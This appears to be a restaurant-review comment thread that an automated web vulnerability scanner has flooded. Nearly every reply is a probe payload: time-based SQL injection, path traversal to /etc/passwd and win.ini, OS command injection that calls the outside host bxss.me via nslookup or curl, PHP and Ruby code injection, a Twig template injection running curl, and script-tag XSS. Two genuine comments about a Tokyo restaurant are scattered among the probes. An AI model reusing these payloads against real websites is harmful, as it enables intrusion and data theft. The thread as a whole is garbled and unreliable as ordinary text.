MwzhTDHz'; waitfor delay '0:0:15' --
re: guest
-1 OR 586=(SELECT 586 FROM PG_SLEEP(15))--
re: guest
-1) OR 185=(SELECT 185 FROM PG_SLEEP(15))--
re: guest
-1)) OR 849=(SELECT 849 FROM PG_SLEEP(15))--
re: guest
2UQEBPYD' OR 125=(SELECT 125 FROM PG_SLEEP(15))--
re: guest
NbwJtkxW') OR 102=(SELECT 102 FROM PG_SLEEP(15))--
re: guest
LEGNSIel')) OR 184=(SELECT 184 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
'"
re: guest
@@kdA6K
re: guest
(select 198766*667891)
re: guest
(select 198766*667891 from DUAL)
Hardly find any restaurant that dont increase price over the new year….
re: guest
o6wWov4H
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+553-553-1=0+0+0+1
re: guest
-1 OR 3+553-553-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
NDJPW56f'; waitfor delay '0:0:15' --
re: guest
-5 OR 201=(SELECT 201 FROM PG_SLEEP(15))--
re: guest
-5) OR 142=(SELECT 142 FROM PG_SLEEP(15))--
re: guest
-1)) OR 434=(SELECT 434 FROM PG_SLEEP(15))--
re: guest
pWl1Nwev' OR 915=(SELECT 915 FROM PG_SLEEP(15))--
re: guest
3X9Gmh3v') OR 368=(SELECT 368 FROM PG_SLEEP(15))--
re: guest
nRaQrNbA')) OR 426=(SELECT 426 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
woWDszGL
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+51-51-1=0+0+0+1
re: guest
-1 OR 3+51-51-1=0+0+0+1
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@M1Ur1
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
fOSVozeX'; waitfor delay '0:0:15' --
re: guest
-5 OR 560=(SELECT 560 FROM PG_SLEEP(15))--
re: guest
-5) OR 301=(SELECT 301 FROM PG_SLEEP(15))--
re: guest
-1)) OR 733=(SELECT 733 FROM PG_SLEEP(15))--
re: guest
et7J1Vrs' OR 488=(SELECT 488 FROM PG_SLEEP(15))--
re: guest
j9nbFc4d') OR 981=(SELECT 981 FROM PG_SLEEP(15))--
re: guest
MNEB6yaW')) OR 709=(SELECT 709 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@HV6c0
re: guest
1ZHPZx72O
re: guest
response.write(9620134*9387813)
re: guest
'+response.write(9620134*9387813)+'
re: guest
"+response.write(9620134*9387813)+"
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
echo fmxxyb$()\ qjkxmh\nz^xyu||a #' &echo fmxxyb$()\ qjkxmh\nz^xyu||a #|" &echo fmxxyb$()\ qjkxmh\nz^xyu||a #
re: guest
file:///etc/passwd
re: guest
&echo bczgiy$()\ ljcvzh\nz^xyu||a #' &echo bczgiy$()\ ljcvzh\nz^xyu||a #|" &echo bczgiy$()\ ljcvzh\nz^xyu||a #
re: guest
../../../../../../../../../../../../../../../proc/version
re: guest
|echo cufmiu$()\ qzbcfe\nz^xyu||a #' |echo cufmiu$()\ qzbcfe\nz^xyu||a #|" |echo cufmiu$()\ qzbcfe\nz^xyu||a #
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: guest
(nslookup hitzjrzuqspta7226a.bxss.me||perl -e "gethostbyname('hitzjrzuqspta7226a.bxss.me')")
re: guest
../../../../../../../../../../etc/passwd%00.jpg
re: guest
$(nslookup hitjhvvxpnuzlbca73.bxss.me||perl -e "gethostbyname('hitjhvvxpnuzlbca73.bxss.me')")
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: guest
&nslookup hitwcmywimikreb71b.bxss.me&'\"`0&nslookup hitwcmywimikreb71b.bxss.me&`'
re: guest
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: guest
&(nslookup hitiqczywinsq19b5d.bxss.me||perl -e "gethostbyname('hitiqczywinsq19b5d.bxss.me')")&'\"`0&(nslookup hitiqczywinsq19b5d.bxss.me||perl -e "gethostbyname('hitiqczywinsq19b5d.bxss.me')")&`'
re: guest
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: guest
|(nslookup hityfcevatyoa93608.bxss.me||perl -e "gethostbyname('hityfcevatyoa93608.bxss.me')")
re: guest
/etc/passwd
re: guest
`(nslookup hitgqvwxprtyy34e6f.bxss.me||perl -e "gethostbyname('hitgqvwxprtyy34e6f.bxss.me')")`
re: guest
%2fetc%2fpasswd
re: guest
;(nslookup hittvgdiehzty0ee8e.bxss.me||perl -e "gethostbyname('hittvgdiehzty0ee8e.bxss.me')")|(nslookup hittvgdiehzty0ee8e.bxss.me||perl -e "gethostbyname('hittvgdiehzty0ee8e.bxss.me')")&(nslookup hittvgdiehzty0ee8e.bxss.me||perl -e "gethostbyname('hittvgdiehzty0ee8e.bxss.me')")
re: guest
/.././.././.././.././.././.././.././../etc/./passwd%00
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: guest
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: guest
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: guest
%0abcc:074625.67-14490.67.112b9.19990.2@bxss.me
re: guest
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: guest
to@example.com>%0d%0abcc:074625.67-14491.67.112b9.19990.2@bxss.me
re: guest
file:///etc/passwd
re: guest
/\../\../\../\../\../\../\../etc/passwd
re: guest
/WEB-INF/web.xml
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
C:\WINDOWS\system32\drivers\etc\hosts
re: guest
../../../../../../../../../../windows/win.ini%00.jpg
re: guest
/../../../../../../../../../../boot.ini
re: guest
${9999018+9999751}
re: guest
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: guest
..\..\..\..\..\..\..\..\windows\win.ini
re: guest
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: guest
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: guest
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: guest
WEB-INF/web.xml
re: guest
)
re: guest
WEB-INF\web.xml
re: guest
!(()&&!|*|*|
re: guest
^(#$!@#$)(()))******
re: guest
'.gethostbyname(lc('hitsh'.'irppqykj1f2fd.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(100).chr(79).chr(112).chr(89).'
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: guest
".gethostbyname(lc("hitsu"."yqsdukbjc41ed.bxss.me."))."A".chr(67).chr(hex("58")).chr(104).chr(78).chr(111).chr(87)."
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: guest
Http://bxss.me/t/fit.txt
re: guest
http://bxss.me/t/fit.txt%3F.jpg
re: guest
/etc/shells
re: guest
c:/windows/win.ini
re: guest
bxss.me
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
bxss.me/t/xss.html?%00
re: guest
"+"A".concat(70-3).concat(22*4).concat(105).concat(66).concat(114).concat(66)+(require"socket"
Socket.gethostbyname("hitcv"+"sumpwucwdf9f0.bxss.me.")[3].to_s)+"
re: guest
'+'A'.concat(70-3).concat(22*4).concat(113).concat(79).concat(100).concat(86)+(require'socket'
Socket.gethostbyname('hitfm'+'jrdfctco649f4.bxss.me.')[3].to_s)+'
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
';print(md5(31337));$a='
re: guest
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: guest
";print(md5(31337));$a="
re: guest
${@print(md5(31337))}
re: guest
${@print(md5(31337))}\
re: guest
'.print(md5(31337)).'
re: guest
'"
re: guest
<!--
re: guest
1
re: guest
1
re: guest
-1 OR 2+414-414-1=0+0+0+1 --
re: guest
-1 OR 3+414-414-1=0+0+0+1 --
re: guest
-1 OR 2+54-54-1=0+0+0+1
re: guest
-1 OR 3+54-54-1=0+0+0+1
re: guest
-1' OR 2+726-726-1=0+0+0+1 --
re: guest
-1' OR 3+726-726-1=0+0+0+1 --
re: guest
-1' OR 2+948-948-1=0+0+0+1 or 'F10dj3j5'='
re: guest
-1' OR 3+948-948-1=0+0+0+1 or 'F10dj3j5'='
re: guest
-1" OR 2+407-407-1=0+0+0+1 --
re: guest
-1" OR 3+407-407-1=0+0+0+1 --
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
rBj3cB2y'; waitfor delay '0:0:15' --
re: guest
-5 OR 927=(SELECT 927 FROM PG_SLEEP(15))--
re: guest
-5) OR 812=(SELECT 812 FROM PG_SLEEP(15))--
re: guest
-1)) OR 804=(SELECT 804 FROM PG_SLEEP(15))--
re: guest
ZSt160OE' OR 825=(SELECT 825 FROM PG_SLEEP(15))--
re: guest
RTJVqm2t') OR 592=(SELECT 592 FROM PG_SLEEP(15))--
re: guest
vdsieUzm')) OR 936=(SELECT 936 FROM PG_SLEEP(15))--
re: guest
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@n9OUC
re: guest
17H9CDTXZ0
re: guest
response.write(9960916*9215788)
re: guest
'+response.write(9960916*9215788)+'
re: guest
"+response.write(9960916*9215788)+"
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
${9999509+9999286}
re: guest
file:///etc/passwd
re: guest
../
re: guest
)
re: guest
!(()&&!|*|*|
re: guest
redirtest.acx
re: guest
^(#$!@#$)(()))******
re: guest
ctime
sleep
p0
(I30
tp1
Rp2
.
re: guest
'.gethostbyname(lc('hitze'.'okoexxmi410c0.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(90).chr(97).chr(71).'
re: guest
".gethostbyname(lc("hitkr"."dhcguwwvbdc98.bxss.me."))."A".chr(67).chr(hex("58")).chr(111).chr(70).chr(116).chr(88)."
re: guest
echo vetddy$()\ eprqzv\nz^xyu||a #' &echo vetddy$()\ eprqzv\nz^xyu||a #|" &echo vetddy$()\ eprqzv\nz^xyu||a #
re: guest
gethostbyname(lc('hithi'.'cqxtmkntcce5e.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(83).chr(102).chr(86)
re: guest
&echo xzjaby$()\ wmhuso\nz^xyu||a #' &echo xzjaby$()\ wmhuso\nz^xyu||a #|" &echo xzjaby$()\ wmhuso\nz^xyu||a #
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: guest
|echo hmjsib$()\ gbktsm\nz^xyu||a #' |echo hmjsib$()\ gbktsm\nz^xyu||a #|" |echo hmjsib$()\ gbktsm\nz^xyu||a #
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: guest
expr 9000654495 - 916251
re: guest
/etc/shells
re: guest
(nslookup -q=cname hithdichejjnkfe508.bxss.me||curl hithdichejjnkfe508.bxss.me))
re: guest
../../../../../../../../../../../../../../etc/shells
re: guest
$(nslookup -q=cname hitazgakolhqz4bdc0.bxss.me||curl hitazgakolhqz4bdc0.bxss.me)
re: guest
c:/windows/win.ini
re: guest
bxss.me
re: guest
&nslookup -q=cname hitbcuqgylixqf33bc.bxss.me&'\"`0&nslookup -q=cname hitbcuqgylixqf33bc.bxss.me&`'
re: guest
Http://bxss.me/t/fit.txt
re: guest
&(nslookup -q=cname hitnuyxnquihbd20b3.bxss.me||curl hitnuyxnquihbd20b3.bxss.me)&'\"`0&(nslookup -q=cname hitnuyxnquihbd20b3.bxss.me||curl hitnuyxnquihbd20b3.bxss.me)&`'
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
http://bxss.me/t/fit.txt?.jpg
re: guest
|(nslookup -q=cname hithvhypsagok00ce5.bxss.me||curl hithvhypsagok00ce5.bxss.me)
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
';print(md5(31337));$a='
re: guest
`(nslookup -q=cname hitsslxduatyga626b.bxss.me||curl hitsslxduatyga626b.bxss.me)`
re: guest
bxss.me/t/xss.html?%00
re: guest
";print(md5(31337));$a="
re: guest
;(nslookup -q=cname hitxawspbanxiadf52.bxss.me||curl hitxawspbanxiadf52.bxss.me)|(nslookup -q=cname hitxawspbanxiadf52.bxss.me||curl hitxawspbanxiadf52.bxss.me)&(nslookup -q=cname hitxawspbanxiadf52.bxss.me||curl hitxawspbanxiadf52.bxss.me)
re: guest
${@print(md5(31337))}
re: guest
|(nslookup${IFS}-q${IFS}cname${IFS}hitegrafnenhc829ef.bxss.me||curl${IFS}hitegrafnenhc829ef.bxss.me)
re: guest
${@print(md5(31337))}\
re: guest
&(nslookup${IFS}-q${IFS}cname${IFS}hitvlibvmwwllecc08.bxss.me||curl${IFS}hitvlibvmwwllecc08.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitvlibvmwwllecc08.bxss.me||curl${IFS}hitvlibvmwwllecc08.bxss.me)&`'
re: guest
"+"A".concat(70-3).concat(22*4).concat(109).concat(67).concat(118).concat(88)+(require"socket"
Socket.gethostbyname("hitvh"+"hphyltob57100.bxss.me.")[3].to_s)+"
re: guest
'.print(md5(31337)).'
re: guest
'+'A'.concat(70-3).concat(22*4).concat(102).concat(69).concat(109).concat(67)+(require'socket'
Socket.gethostbyname('hitww'+'bzudqyxsd9888.bxss.me.')[3].to_s)+'
re: guest
'A'.concat(70-3).concat(22*4).concat(104).concat(79).concat(121).concat(73)+(require'socket'
Socket.gethostbyname('hitoc'+'ykqpgqfe9b3b1.bxss.me.')[3].to_s)
re: guest
'"()
re: guest
'&&sleep(27*1000)*qkuest&&'
re: guest
"&&sleep(27*1000)*touegb&&"
re: guest
'||sleep(27*1000)*unbudf||'
re: guest
replies
re: guest
"||sleep(27*1000)*dyfyby||"
re: guest
replies�
re: guest
replies/.
re: guest
'"
re: guest
<!--
re: guest
'"()&%<zzz><ScRiPt >Z6SP(9688)</ScRiPt>
re: guest
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitcvofulzjcidfcb0.bxss.me")}}
re: guest
'"()&%<zzz><ScRiPt >Z6SP(9733)</ScRiPt>
re: guest
9794431
re: guest
y8aehgJH
re: guest
*1
re: guest
*1
re: guest
*1
re: guest
*1
re: guest
-1 OR 5*5=25 --
re: guest
-1 OR 5*5=26 --
re: guest
-1 OR 5*5=25
re: guest
-1 OR 5*5=26
re: guest
*if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
-1 waitfor delay '0:0:15' --
re: guest
TusBpeIq'; waitfor delay '0:0:15' --
re: guest
-1 OR 838=(SELECT 838 FROM PG_SLEEP(15))--
re: guest
-1) OR 243=(SELECT 243 FROM PG_SLEEP(15))--
re: guest
-1)) OR 348=(SELECT 348 FROM PG_SLEEP(15))--
re: guest
ROxdFsnu' OR 603=(SELECT 603 FROM PG_SLEEP(15))--
re: guest
P4R3jh8h') OR 171=(SELECT 171 FROM PG_SLEEP(15))--
re: guest
aDkA2OKQ')) OR 340=(SELECT 340 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
'"
re: guest
@@WfA5Q
re: guest
(select 198766*667891)
re: guest
(select 198766*667891 from DUAL)
I went back for my 3rd visit and its the first time I went in March. Previous times I went in October. So neta was a little different. Wasn't as mind blowingly good this time, previous visit I thought basically every morsel was magnificent. This time, about 80% were superb. Still my favourite place to visit and highly recommend to anyone visiting tokyo. The train ride isnt that bad and its a 10-15min walk from the station.
re: Wanderlusting
HNHJpnCy
re: Wanderlusting
1*
re: Wanderlusting
1*
re: Wanderlusting
1*
re: Wanderlusting
1*
re: Wanderlusting
uola72e7
re: Wanderlusting
